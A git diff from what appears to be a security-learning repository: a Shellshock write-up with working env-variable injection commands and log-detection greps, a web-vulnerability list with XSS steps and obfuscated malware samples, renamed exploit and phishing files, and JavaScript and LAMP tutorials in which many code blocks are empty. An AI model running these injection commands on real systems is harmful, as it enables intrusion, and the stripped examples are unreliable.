NOOOOOOOOOOOOOOO!' bash -c 'grep fun file.txt' +grep: {: No such file or directory +grep: :;};: No such file or directory +grep: echo: No such file or directory +grep: NOOOOOOOOOOOOOOO!: No such file or directory +grep: fun: No such file or directory +file.txt:bash can be super fun +file.txt:bash can be dangerous + +``` + +Did you notice the confusion? *Both* matches and non-matches were printed! It means that some stuff was parsed well! When in doubt, Bash appears to do *everything*? + +Now, what if we just keep the function, taking out the only thing that makes sense, ```-v```? +```sh +$ env GREP_OPTIONS='() { :;}; echo NOOOOOOOOOOOOOOO!' bash -c 'grep fun file.txt' +NOOOOOOOOOOOOOOO! +grep: {: No such file or directory +grep: :: No such file or directory +grep: }: No such file or directory +grep: fun: No such file or directory +``` +Did you notice that ```echo NOOOOOOOOOOOOOOO!``` was executed normally? **This is the (first) Shellshock bug!** + +This works because when the new shell sees an environment variable beginning with ```()```, it gets the variable name and executes the string following it. This includes running anything after the function, *i.e*, the evaluation does not stop when the end of the function definition is reached! + +Remember that ```echo``` is not the only thing we can do. The possibilities are unlimited! For example, we can issue any ```/bin``` command: +```sh +$ env GREP_OPTIONS='() { :;}; /bin/ls' bash -c 'grep fun file.txt' +anaconda certificates file.txt IPython +(...) +``` + +WOW. + +Worse, we actually don't need to use a system environment variable nor even call a real command: +```sh +$ env test='() { :;}; echo STILL NOOOOOOOO!!!!' bash -c : +STILL NOOOOOOOO!!!! +``` + + +In the example above, ```env``` runs a command with an arbitrary variable (test) set to some function (in this case is just a single ```:```, a Bash command defined as doing nothing). The semi-colon signals the end of the function definition. Again, the bug is in the fact that there's nothing stopping the parsing of what is after the semi-colon! + + +Now it's easy to see if your system is vulnerable, all you need to do is run: +```sh +$ env x='() { :;}; echo The system is vulnerable!' bash -c : +``` + +That simple. + + + +[GNU Bourne Again shell (BASH)]: http://www.gnu.org/software/bash/ +[Unix shell]: http://en.wikipedia.org/wiki/Bash_(Unix_shell) +[Brian Fox]: http://en.wikipedia.org/wiki/Brian_Fox_(computer_programmer) +[GNU Project]: http://www.gnu.org/gnu/thegnuproject.html +[Bourne shell]: http://en.wikipedia.org/wiki/Bourne_shell +[command language interpreter]:http://en.wikipedia.org/wiki/Command-line_interface +[other command shells out there]: http://en.wikipedia.org/wiki/Comparison_of_command_shells + + +---- + +## There is more than one! +The Shellshock vulnerability is an example of an [arbitrary code execution] (ACE) vulnerability, which is executed on running programs. An attacker will use an ACE vulnerability to run a program that gives her a simple way of controlling the targeted machine. This is nicely achieved by running a Shell such as Bash. + +It is not surprising that right after a patch for [CVE-2014-6271] was released, several new issues were opened: + +[arbitrary code execution]: http://en.wikipedia.org/wiki/Arbitrary_code_execution + + +* [CVE-2014-7169]: Right after the first bug was disclosed, a [tweet] from [Tavis Ormandy] showed a *further parser error* that became the second vulnerability: +```sh +$ env X='() { (a)=>\' bash -c "echo vulnerable"; bash -c "echo Bug CVE-2014-7169 patched" +vulnerable +``` + +* [CVE-2014-7186] and [CVE-2014-7187]: A little after the second bug, two other bugs were found by [Florian Weimer]. One concerning *out of bound memory read error* in [redir_stack] and the other an *off-by-one error in nested loops*. You can check these vulnerabilities in your system [with this script]. + +* [CVE 2014-6277] and [CVE 2014-6278]: A couple of days ago, these new bugs were found by [Michal Zalewski]. + +What do you think, is Shellshock [just a blip]? + +[just a blip]: http://blog.erratasec.com/2014/09/the-shockingly-bad-code-of-bash.html +[with this script]: https://github.com/hannob/bashcheck +[Florian Weimer]: http://www.enyo.de/fw/ + +[Michal Zalewski]:http://lcamtuf.blogspot.de/2014/09/bash-bug-apply-unofficial-patch-now.html + +[CVE 2014-6277]: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277 + +[CVE 2014-6278]: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278 +[tweet]: https://twitter.com/taviso/status/514887394294652929 + +[Tavis Ormandy]: http://taviso.decsystem.org/ + +[redir_stack]: http://tools.cisco.com/security/center/viewAlert.x?alertId=35860 + +---- +## Suggestions to Protect Your System + + +Several patches have been released since the Shellshock vulnerabilities were found. Although at this point they [seem to solve most of the problem], below are some recommendations to keep your system safer: + +[seem to solve most of the problem]: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/ + + +- Update your system! And keep updating it... Many Linux distributions have released new Bash software versions, so follow the instructions of your distribution. In most of the cases, a simple ```yum update``` or ```apt-get update``` or similar will do it. If you have several servers, the script below can be helpful: +```sh +#!/bin/bash +servers=( +120.120.120.120 +10.10.10.10 +22.22.22.22 +) +for server in ${servers[@]} +do +ssh $server 'yum -y update bash' +done +``` + + + + +- Update firmware on your router or any other web-enabled devices, as soon as they become available. Remember to only download patches from reputable sites (only HTTPS please!), since scammers will likely try to take advantage of Shellshock reports. + + +- Keep an eye on all of your accounts for signs of unusual activity. Consider changing important passwords. + + + + +- HTTP requests to CGI scripts have been identified as the major attack vector. Disable any scripts that call on the shell (however, it does not fully mitigate the vulnerability). To check if your system is vulnerable, you can use [this online scanner]. Consider [mod_security] if you're not already using it. + + + +- Because the HTTP requests used by Shellshock exploits are quite unique, monitor logs with keywords such as ```grep '() {' access_log```or ```cat access_log |grep "{ :;};"```. Some common places for http logs are: ```cPanel: /usr/local/apache/domlogs/```, ```Debian/Apache: /var/log/apache2/```, or ```CentOS: /var/log/httpd/```. + +- [Firewall and network filters] can be set to block requests that contain a signature for the attack, *i.e* ```“() {“```. + +- If case of an attack, publish the attacker's information! You can use [awk] and [uniq] (where *print $1* means print the first column) to get her IP, for example: +```sh +$ cat log_file |grep "{ :;};" | awk '{print $1}'|uniq +``` + + + +- If you are on a managed hosting subscription, check your company's status. For example: [Acquia], [Heroku], [Mediatemple], and [Rackspace]. + +- Update your Docker containers and AWS instances. + + +- If you are running production systems that don't need exported functions at all, take a look at [this wrapper] that refuses to run bash if any environment variable's value starts with a left-parent. + + +[Firewall and network filters]: https://access.redhat.com/articles/1212303 +[this wrapper]: https://github.com/dlitz/bash-shellshock +[this online scanner]: http://milankragujevic.com/projects/shellshock/ +[mod_security]: https://access.redhat.com/articles/1212303 +[CVE-2014-6278]: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278 +[CVE-2014-6277]: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277 +[CVE-2014-7187]: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187 +[CVE-2014-7186]: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186 +[CVE-2014-7169]:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169 +[CVE-2014-6271]:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 +[Acquia]: https://docs.acquia.com/articles/september-2014-gnu-bash-upstream-security-vulnerability +[Rackspace]: https://status.rackspace.com/ +[Mediatemple]: http://status.mediatemple.net/ +[Heroku]: https://status.heroku.com/incidents/665 +[awk]: http://www.grymoire.com/Unix/Awk.html +[uniq]: http://en.wikipedia.org/wiki/Uniq + + + + +--- + +## Further References + + +#### Reviews + +[http://stephane.chazelas.free.fr/](http://stephane.chazelas.free.fr) + +[https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack](https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack) + +[http://lcamtuf.blogspot.co.uk/2014/09/quick-notes-about-bash-bug-its-impact.html](http://lcamtuf.blogspot.co.uk/2014/09/quick-notes-about-bash-bug-its-impact.html) + +[http://www.openwall.com/lists/oss-security/2014/09/24/11](http://www.openwall.com/lists/oss-security/2014/09/24/11) + +[http://blog.erratasec.com/2014/09/bash-bug-as-big-as-heartbleed.html#.VCNbefmSx8G](http://blog.erratasec.com/2014/09/bash-bug-as-big-as-heartbleed.html#.VCNbefmSx8G) + +[http://seclists.org/oss-sec/2014/q3/649](http://seclists.org/oss-sec/2014/q3/649) + +[http://www.circl.lu/pub/tr-27/#recommendations](http://www.circl.lu/pub/tr-27/#recommendations) + +[http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html](http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html) + +[http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html](http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html) + +#### Bugs Description + +[http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-025](http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-025) + +[http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-026](http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-026) + +[http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-027](http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-027) + +[http://blog.cloudflare.com/inside-shellshock/](http://blog.cloudflare.com/inside-shellshock/) + + + + +#### Proof-of-Concept Attacks + +[https://github.com/mubix/shellshocker-pocs]:https://github.com/mubix/shellshocker-pocs + +[http://research.zscaler.com/2014/09/shellshock-attacks-spotted-in-wild.html](http://research.zscaler.com/2014/09/shellshock-attacks-spotted-in-wild.html) + +[http://www.clevcode.org/cve-2014-6271-shellshock/](http://www.clevcode.org/cve-2014-6271-shellshock/) + +[https://www.invisiblethreat.ca/2014/09/cve-2014-6271/](https://www.invisiblethreat.ca/2014/09/cve-2014-6271/) + +[http://marc.info/?l=qmail&m=141183309314366&w=2](http://marc.info/?l=qmail&m=141183309314366&w=2) + +[https://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.html](https://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.html) + +[https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/](https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/) + +[https://www.invisiblethreat.ca/2014/09/cve-2014-6271/](https://www.invisiblethreat.ca/2014/09/cve-2014-6271/) + +[http://pastebin.com/VyMs3rRd](http://pastebin.com/VyMs3rRd) + +[http://infosecnirvana.com/shellshock-hello-honeypot/](http://infosecnirvana.com/shellshock-hello-honeypot/) + +[https://isc.sans.edu/forums/diary/Shellshock+A+Collection+of+Exploits+seen+in+the+wild/18725](https://isc.sans.edu/forums/diary/Shellshock+A+Collection+of+Exploits+seen+in+the+wild/18725) diff --git a/Web_Security/README.md b/Web_Hacking/A_list_of_common_vulnerabilities.md similarity index 54% rename from Web_Security/README.md rename to Web_Hacking/A_list_of_common_vulnerabilities.md index 4791058..b0041d8 100644 --- a/Web_Security/README.md +++ b/Web_Hacking/A_list_of_common_vulnerabilities.md @@ -1,5 +1,343 @@ -# Web Security +# A List of Common Web Vulnerabilities +Although nomenclatures don't help much when you are facing a security problem, I am keeping this list for a systematic organization. It has regularly been updated. + +In addition to this list, you can check some specific web exploration older posts: [Exploiting the web in 20 lessons](http://bt3gl.github.io/exploiting-the-web-in-20-lessons-natas.html) and [D-Camp CTF 2014](http://bt3gl.github.io/exploring-d-ctf-quals-2014s-exploits.html). + + + +## Cross-site Scripting (XSS) + +XSS is caused by **insufficient input validation or output escaping**. This vulnerability can allow an attacker to insert HTML markup or scripts in a vulnerable website. The injected code will have plenty of access in this site, and in many cases, to the HTTP cookies stored by the client. + + +HTML has five characters that are reserved: + +* **both angle brackets**, + +* **single and double quotes**, + +* and **ampersand**. + +The ampersand should never appear in most HTML sections. Both angle brackets should not be used inside a tag unless adequately quoted. Quote characters inside a tag can also be harmless in text. + +To allow these characters to appear in problematic locations, an encoding based in an ampersand-prefixed and a semicolon-terminated scheme is used: the [Entity Encoding](http://www.w3schools.com/html/html_entities.asp). + + +### Non-Persistent Attack: + +XSS non-persistent attacks consist of getting users to click a link with attacker's script. A typical scenario is the following: + +1. The target website performs query searches that are not sanitized. For example, the query could accept scripts on it. A simple example to check this vulnerability is by verifying whether the alert box with the message **Pwnd** is displayed: +``` +http://website.org?q=alert('Pwnd!'); +``` + +2. The attacker crafts an exploit script that gets the victim's authorization information (for example in an **Authorization Cookie**). The attacker sends a **phishing email** to the victim with a link with some script such as: + +``` +http://website.org?q=puppies +``` + +3. If the victim clicks on the link, her/his browser runs the script (legitimate by the **Same Origin Policy**, * i.e.* resources are shared between origins with the same protocol, domain, and port). The attacker now has control of the victim's identity on that website. If the victim is the administrator, it is game over. + + +### Persistent Attack: + +XSS persistent attacks store a malicious script in the databases, which will be retrieved by the users. A typical scenario is the following: + +1. The attacker verifies that the target website has an XSS stored vulnerability (for example, allowing her/him to post text with HTML tags). + +2. The attacker creates an account in the target website and posts something with a hidden script (similar to the one above). + +3. When anyone loads the page with that post, the script runs, and the attacker is able to hijack the victim's section. + + +Additionally, in *password managers*, there is a risk of amplification of XSS bugs. In the web applications that use *[httponly](https://www.owasp.org/index.php/HttpOnly)* cookies, successful exploitation of an XSS flaw may give the attacker transient access to the user's account (and password). + + + +### Attempts of mitigation: + +* Servers should use **Content Security Policy** (CSP) HTTP header, which allows the whitelist of resources contents. For instance, the *Content-Security-Policy* header disables inline JavaScript by default. + +* Servers can use the **HttpOnly** HTTP header which allows setting a cookie that is unavailable to client-side scripts. + +* Search inputs should *always* be sanitized in both server-side and client-side. + +* Servers should redirect invalid requests. + +* Servers should invalidate sessions from different IP addresses. However, this can be mitigated if the attacker is behind a web proxy or behind the same NAT IP. + +* Clients should disabling scripts by default (for example with [NoScript](https://addons.mozilla.org/en-us/firefox/addon/noscript/)). + + + + +--- +## Cross Script Inclusion (XSSI) + + +XSSI comes with the failure to secure sensitive JSON-like responses against being loaded on third-party sites via ``` +``` + +* Scripts that redirects the browser to an attack site: +``` + +``` + +* Malicious code that is obfuscated to avoid detection: + +``` +eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf")); +``` + +* Shared object files designed to write harmful code to otherwise benign scripts randomly: + +``` +#httpd.conf modified by the hacker +LoadModule harmful_module modules/mod_harmful.so +AddModule mod_harmful.c +``` + +* The **Error template type of malware infection** occurs when the template used for error messages, such as 404 File not Found, is configured to distribute malware. In this way, attackers can launch attacks on URLs that do not even exist on the victim's website. + +### Attempts of mitigation: +* Investigate all possible harmful code on the website. It may be helpful to search for words like [iframe] to find iframe code. Other helpful keywords are "script", "eval", and "unescape." For example, on Unix-based systems: + +```sh +$ grep -irn "iframe" ./ | less +``` + + + + +---- +## Directory Traversal + +Due to insufficient filtering (such as the failure to recognize ```../``` segments) an application can be tricked into reading or writing files at arbitrary locations. Unconstrained file-writing bugs can be exploitable to run attacker-supplied code. + + +--- +## File Inclusion + +If used without a qualifier or prefixed with a *local* (LFI), the term is synonymous to read-related directory traversal. Remote file inclusion (RFI) is an alternative way to exploit file-inclusion vulnerabilities by specifying a URL rather than a valid file path. In some languages, a common API opens local files and fetches remote URLs, which might supply the ability to retrieve the attacker's files. + + +---- +## Format String Vulnerability + +Several libraries accept templates (format strings) followed by a set of parameters that the function is expected to insert into the template at predefined locations. For example, C has functions such as *printf*, *syslog*, etc. The vulnerability is caused by permitting attackers to supply the template to one of these functions. This can lead to data leaks and code execution. + + +--- +## Integer Overflow + +Vulnerability specific to languages with no range checking. The flaw is caused by the developer failing to detect that an integer exceeded the maximum possible value and rolled back to zero, to a large negative integer, or to some hardware-specific result. + +Integer underflow is the opposite effect: crossing the minimum value and rolling over to a very large positive integer. + + +--- +## Pointer Management Vulnerabilities + +In languages that use raw memory pointers such as C or C++, it is possible to use pointers that are either unitized or nor longer valid (dangling). These vulnerabilities will corrupt the internal state of the program and allow an attacker to execute attacker-supplied code. + + +--- +## Cache poisoning attacks + +Several variants of DNS spoofing attacks that can result in cache poisoning. + +### Example of Attack + +1. The attacker sends a target DNS resolver multiple queries for a domain name for which she/he knows the server is not authoritative, and that is unlikely to be in the server's cache. + +2. The resolver sends out requests to other nameservers (whose IP addresses the attacker can also predict). + +3. In the meantime, the attacker floods the victim server with forged responses that appear to originate from the delegated nameserver. The responses contain records that ultimately resolve the requested domain to IP addresses controlled by the attacker. They might contain answer records for the resolved name or, worse; they may further delegate authority to a nameserver owned by the attacker, so that s/he takes control of an entire zone. + +2. If one of the forged responses matches the resolver's request (for example, by query name, type, ID and resolver source port) and is received before a response from the genuine nameserver, the resolver accepts the forged response and caches it, and discards the genuine response. + +5. Future queries for the compromised domain or zone are answered with the forged DNS resolutions from the cache. If the attacker has specified a very long time-to-live on the forged response, the forged records stay in the cache for as long as possible without being refreshed. + + +---- + +# References: + +* [The Tangled Web](http://www.amazon.com/The-Tangled-Web-Securing-Applications/dp/1593273886) +* [Django Security](https://docs.djangoproject.com/en/dev/topics/security/) +* [Bleach: Sanitizing Tool in Python](https://docs.djangoproject.com/en/dev/topics/security/) +* [Google's Public DNS](https://developers.google.com/speed/public-dns/docs/security) + + + +--- + +# Tools ### urllib2 diff --git a/Web_Hacking/JavaScript_crash_course.md b/Web_Hacking/JavaScript_crash_course.md new file mode 100644 index 0000000..88c97ed --- /dev/null +++ b/Web_Hacking/JavaScript_crash_course.md @@ -0,0 +1,423 @@ +# JavaScript: Crash Course + + +# Installing & Setting up + +JavaScript (JS) is a dynamic computer programming language. Install [Google Dev Tools](https://developer.chrome.com/devtools/index) to proceed. + +# JavaScript 101 + +To include your example.js in an HTML page (usually placed right before will guarantee that elements are defined when the script is executed): + +``` + +``` + +Variables can be defined using multiple var statements or in a single combined var statement. The value of a variable declared without a value is undefined. + +## Types in JavaScript + +### Primitive: + + - String + - Number + - Boolean + - null (represent the absence of a value, similar to many other programming languages) + - undefined (represent a state in which no value has been assigned at all) + +### Objects: + +``` +// Creating an object with the constructor: +var person1 = new Object; + +person1.firstName = "John"; +person1.lastName = "Doe"; + +alert( person1.firstName + " " + person1.lastName ); +// Creating an object with the object literal syntax: +var person2 = { + firstName: "Jane", + lastName: "Doe" +}; + +alert( person2.firstName + " " + person2.lastName ); +Array + +// Creating an array with the constructor: +var foo = new Array; +// Creating an array with the array literal syntax: +var bar = []; +If/Else + +var foo = true; +var bar = false; + +if ( bar ) { + // This code will never run. + console.log( "hello!" ); +} + +if ( bar ) { + + // This code won't run. + +} else { + + if ( foo ) { + // This code will run. + } else { + // This code would run if foo and bar were both false. + } + +} +``` + +### Flow Control + +#### switch + +``` +switch ( foo ) { + + case "bar": + alert( "the value was bar -- yay!" ); + break; + + case "baz": + alert( "boo baz :(" ); + break; + + default: + alert( "everything else is just ok" ); + +} +``` + +#### for + +``` +for ( var i = 0; i < 5; i++ ) { + // Logs "try 0", "try 1", ..., "try 4". + console.log( "try " + i ); +} +``` + +#### while + +``` +var i = 0; +while ( i < 100 ) { + // This block will be executed 100 times. + console.log( "Currently at " + i ); + i++; // Increment i +} +or + +var i = -1; +while ( ++i < 100 ) { + // This block will be executed 100 times. + console.log( "Currently at " + i ); +} +``` + + +#### do-while + +``` +do { + // Even though the condition evaluates to false + // this loop's body will still execute once. + alert( "Hi there!" ); + +} while ( false ); +``` + +### Ternary Operator + +``` +// Set foo to 1 if bar is true; otherwise, set foo to 0: +var foo = bar ? 1 : 0; +``` + +### Arrays + +``` +.length + +var myArray = [ "hello", "world", "!" ]; + +for ( var i = 0; i < myArray.length; i = i + 1 ) { + + console.log( myArray[ i ] ); + +} +.concat() + +var myArray = [ 2, 3, 4 ]; +var myOtherArray = [ 5, 6, 7 ]; +var wholeArray = myArray.concat( myOtherArray ); +.join() + + // Joining elements + +var myArray = [ "hello", "world", "!" ]; + +// The default separator is a comma. +console.log( myArray.join() ); // "hello,world,!" + +// Any string can be used as separator... +console.log( myArray.join( " " ) ); // "hello world !"; +console.log( myArray.join( "!!" ) ); // "hello!!world!!!"; + +// ...including an empty one. +console.log( myArray.join( "" ) ); +.pop() and .push() +``` + +#### Remove or add last element + +Extracts a part of the array and returns that part in a new array. This method takes one parameter, which is the starting index: +``` +.reverse() + +var myArray = [ "world" , "hello" ]; +myArray.reverse(); // [ "hello", "world" ] +.shift() + +var myArray = []; + +myArray.push( 0 ); // [ 0 ] +myArray.push( 2 ); // [ 0 , 2 ] +myArray.push( 7 ); // [ 0 , 2 , 7 ] +myArray.shift(); // [ 2 , 7 ] +.slice() +``` + + +#### Remove a certain amount of elements + +Abd adds new ones at the given index. It takes at least three parameters: + +* Index – The starting index. +* Length – The number of elements to remove. +* Values – The values to be inserted at the index position. + +``` +var myArray = [ 0, 7, 8, 5 ]; +myArray.splice( 1, 2, 1, 2, 3, 4 ); +console.log( myArray ); // [ 0, 1, 2, 3, 4, 5 ] +.sort() +``` + +#### Sorts an array + +It takes one parameter, which is a comparing function. If this function is not given, the array is sorted ascending: +``` +// Sorting with comparing function. + +function descending( a, b ) { + return b - a; +} + +var myArray = [ 3, 4, 6, 1 ]; + +myArray.sort( descending ); // [ 6, 4, 3, 1 ] +.unshift() +``` + +#### Inserts an element at the first position of the array + +``` +.forEach() +function printElement( elem ) { + console.log( elem ); +} + +function printElementAndIndex( elem, index ) { + console.log( "Index " + index + ": " + elem ); +} + +function negateElement( elem, index, array ) { + array[ index ] = -elem; +} + +myArray = [ 1, 2, 3, 4, 5 ]; + +// Prints all elements to the consolez +myArray.forEach( printElement ); + +// Prints "Index 0: 1", "Index 1: 2", "Index 2: 3", ... +myArray.forEach( printElementAndIndex ); + +// myArray is now [ -1, -2, -3, -4, -5 ] +myArray.forEach( negateElement ); + +``` + + +### Strings + + +Strings are a primitive and an object in JavaScript. + +Some methods: + +* length +* charAt() +* indexOf() +* substring() +* split() +* toLowerCase +* replace +* slice +* lastIndexOf +* concat +* trim +* toUpperCase + + +### Objects + +Nearly everything in JavaScript is an object – arrays, functions, numbers, even strings - and they all have properties and methods. + +``` +var myObject = { + sayHello: function() { + console.log( "hello" ); + }, + myName: "Rebecca" +}; + +myObject.sayHello(); // "hello" + +console.log( myObject.myName ); // "Rebecca" +The key can be any valid identifier: + +var myObject = { + validIdentifier: 123, + "some string": 456, + 99999: 789 +}; +``` + +### Functions + +Can be created in many ways: + +``` +// Named function expression. +var foo = function() { ----> function expression (load later) + // Do something. +}; + +function foo() { ----> function declaration (load first) + // Do something. +} +If you declare a local variable and forget to use the var keyword, that variable is automatically made global. + +Immediately -Invoked Function Expression: + +(function() { + var foo = "Hello world"; +})(); +console.log( foo ); // undefined! +``` + +### Events + +JavaScript lets you execute code when events are detected. + +Example of code to change a source image: + +``` +windows.onload = init; +function init(){ + var img = docuemnt.GetEventById("example"); + img.src = "example.jpg" +``` + +Methods for events: + +* click +* resize +* play +* pause +* load +* unload +* dragstart +* drop +* mousemove +* mousedown +* keypress +* mouseout +* touchstart +* touchend + + +### Closure + +Closure is one of the main proprieties of JavaScript. + +Example of closure for a counter. Normally we would have the code: + +``` + var count = 0; + function counter(){ + count += 1; + return count +} +console.log(counter()); --> print 1 +console.log(counter()); --> print 2 +``` + +However, in JS we can enclose our counter inside an environment. This is useful for large codes, with multiple collaborations, for example, where we might use count variables more than once: +``` +function makeCounter(){ + var count = 0; + function counter(){ + count += 1; + return count; + } + return counter; ----> closure holds count! +} +``` + +### Prototypes +``` +function dog(name, color){ + this.name = name; + this.color = color; +} + +dog.prototype.species = "canine" +dog.prototype.bark = function{ +} +``` + +### jQuery + +Type Checking with jQuery: + +``` +// Checking the type of an arbitrary value. + +var myValue = [ 1, 2, 3 ]; + +// Using JavaScript's typeof operator to test for primitive types: +typeof myValue === "string"; // false +typeof myValue === "number"; // false +typeof myValue === "undefined"; // false +typeof myValue === "boolean"; // false + +// Using strict equality operator to check for null: +myValue === null; // false + +// Using jQuery's methods to check for non-primitive types: +jQuery.isFunction( myValue ); // false +jQuery.isPlainObject( myValue ); // false +jQuery.isArray( myValue ); // true +``` + +--- +Enjoy! This article was originally posted [here](https://coderwall.com/p/skucrq/javascript-crash-course). \ No newline at end of file diff --git a/Web_Security/OS_Command_Injection/README.md b/Web_Hacking/OS_Command_Injection/README.md similarity index 100% rename from Web_Security/OS_Command_Injection/README.md rename to Web_Hacking/OS_Command_Injection/README.md diff --git a/Web_Security/OS_Command_Injection/sqli_password_brute_force.py b/Web_Hacking/OS_Command_Injection/sqli_password_brute_force.py similarity index 100% rename from Web_Security/OS_Command_Injection/sqli_password_brute_force.py rename to Web_Hacking/OS_Command_Injection/sqli_password_brute_force.py diff --git a/Web_Security/PHP_shellcodes/phpprimer_v0.1.pdf b/Web_Hacking/PHP_shellcodes/phpprimer_v0.1.pdf similarity index 100% rename from Web_Security/PHP_shellcodes/phpprimer_v0.1.pdf rename to Web_Hacking/PHP_shellcodes/phpprimer_v0.1.pdf diff --git a/Web_Security/PHP_shellcodes/tricking_file_extension_gif.php b/Web_Hacking/PHP_shellcodes/tricking_file_extension_gif.php similarity index 100% rename from Web_Security/PHP_shellcodes/tricking_file_extension_gif.php rename to Web_Hacking/PHP_shellcodes/tricking_file_extension_gif.php diff --git a/Web_Security/PHP_shellcodes/xor.php b/Web_Hacking/PHP_shellcodes/xor.php similarity index 100% rename from Web_Security/PHP_shellcodes/xor.php rename to Web_Hacking/PHP_shellcodes/xor.php diff --git a/Web_Security/Phishing/README.md b/Web_Hacking/Phishing/README.md similarity index 100% rename from Web_Security/Phishing/README.md rename to Web_Hacking/Phishing/README.md diff --git a/Web_Security/Phishing/log.php b/Web_Hacking/Phishing/log.php similarity index 100% rename from Web_Security/Phishing/log.php rename to Web_Hacking/Phishing/log.php diff --git a/Web_Security/SQLi/CVE-2014-7289_exploit.py b/Web_Hacking/SQLi/CVE-2014-7289_exploit.py similarity index 100% rename from Web_Security/SQLi/CVE-2014-7289_exploit.py rename to Web_Hacking/SQLi/CVE-2014-7289_exploit.py diff --git a/Web_Security/SQLi/README.md b/Web_Hacking/SQLi/README.md similarity index 100% rename from Web_Security/SQLi/README.md rename to Web_Hacking/SQLi/README.md diff --git a/Web_Security/SQLi/sqli_16_brute_force_password.py b/Web_Hacking/SQLi/sqli_16_brute_force_password.py similarity index 100% rename from Web_Security/SQLi/sqli_16_brute_force_password.py rename to Web_Hacking/SQLi/sqli_16_brute_force_password.py diff --git a/Web_Security/SQLi/sqli_18_timed_SQLi.py b/Web_Hacking/SQLi/sqli_18_timed_SQLi.py similarity index 100% rename from Web_Security/SQLi/sqli_18_timed_SQLi.py rename to Web_Hacking/SQLi/sqli_18_timed_SQLi.py diff --git a/Web_Security/SQLi/sqli_COOKIE_brute.py b/Web_Hacking/SQLi/sqli_COOKIE_brute.py similarity index 100% rename from Web_Security/SQLi/sqli_COOKIE_brute.py rename to Web_Hacking/SQLi/sqli_COOKIE_brute.py diff --git a/Web_Security/Scanners/README.md b/Web_Hacking/Scanners/README.md similarity index 100% rename from Web_Security/Scanners/README.md rename to Web_Hacking/Scanners/README.md diff --git a/Web_Security/Scanners/heartbleed.py b/Web_Hacking/Scanners/heartbleed.py similarity index 100% rename from Web_Security/Scanners/heartbleed.py rename to Web_Hacking/Scanners/heartbleed.py diff --git a/Web_Hacking/intro_to_LAMP.md b/Web_Hacking/intro_to_LAMP.md new file mode 100644 index 0000000..36b442b --- /dev/null +++ b/Web_Hacking/intro_to_LAMP.md @@ -0,0 +1,260 @@ +# Getting started with LAMP and CodeIgniter + + +LAMP is an acronym for a model of web service solution stacks: Linux, the Apache HTTP Server, the MySQL relational database management system, and the PHP programming language. + +## Building a MySQL Database + +We will use a web interface to access data in our database: + +* Login with your root login/password (set in the installation above): ```http://localhost/phpmyadmin```. +The left-hand column contains a list of all of the databases you currently have. + + - mysql: contains information about the MySQL database server. + - information_schema: contains information about all of the other databases on your computer. + +* In the Databases interface you are presented with a list of all of the databases. +* Above that list there should be a form labeled “Create new database” with a text field. +* Create tables within. Chose the types of your data. Every table should always have an id column (auto-incrementing integer, meaning that each new record will be automatically assigned an id value, starting at 1). You can do this by selecting A_I checkbox. +* Add some data (using insert). The database is located at +```/var/lib/mysql```. + +### MySQL Query Basis + +Selecting items: +``` +Retrieve all of the records (* means columns): +SELECT * FROM db_name; +Select only some columns: +SELECT col1, col2 FROM db_name; +Select only some values from some column: +SELECT * FROM db_name WHERE col1 = 'item'; +Select the first 10 items: +SELECT * FROM cars WHERE make = 'Porsche' LIMIT 10 +``` + +Inserting an item: +``` +INSERT INTO db_name (col1, col2, col3) VALUES ('item1', 'item2', 'item3') +``` + +Updating an item: +``` +UPDATE db_name SET col1 = 'item' WHERE col2 = 'item2' AND col3='item3' +``` + +Deleting items: +``` +DELETE db_name WHERE col1 = item" +``` + +## PHP Basics + +Variables: + +``` + +Comments with / or ./* */. +Print function: + +``` + +Functions: +``` + +``` + +When a PHP file is accessed, all of its functions are initialized before any of the other lines of code are executed. As long as a function is defined in the same file, it can be called from anywhere within that file. + +The scope of a variable refers to the domain within which it can be referenced. In PHP, any variables initialized and contained within a function itself are only available within that function. + +### Arrays + +Creating an empty array: + +``` + +``` + +Adding elements: +``` + +``` + +Creating an array with values already: +``` + +``` + +In PHP, arrays are like dictionaries:. If you add item likes above, it will increment from 0. You can also give the key: +``` + echo $dictionary['dog']; +``` + +Multi-arrays: + +``` +$cars = array + ( + array("Volvo",22,18), + array("BMW",15,13), + array("Saab",5,2), + array("Land Rover",17,15) + ); +``` + +Loop foreach: + +``` + +``` + +Loop for: +``` + +``` + +## The Model-View-Controller Pattern (MVC) + +In a high level, the flow of a web app is: + +* User request to view a certain page by typing a URL in the browser. +* The app determines what needs to be displayed. +* The data required for the page is requested and retrieved from the database. +* The resulting data is used to render the page's display to the user. +* The MVC structure is based on the presence of 3 main components: models, views, and controllers. + +### Models: Representing the Data Object + +Responsible for communicating with the database. Composed of two parts: + +* fields: Responsible for representing the various pieces of data within an object (the information within the database). +* methods: Provide extra functionality within our models. Allow the manipulation of the model's initial information or perform additional actions related to the data. + +### Controllers: Workhorses + +Determine what objects to retrieve and how to organize them. + +Handle user request, retrieve proper information, and pass it to the proper view. + +Different request is handled by different controller actions. + +### Views: 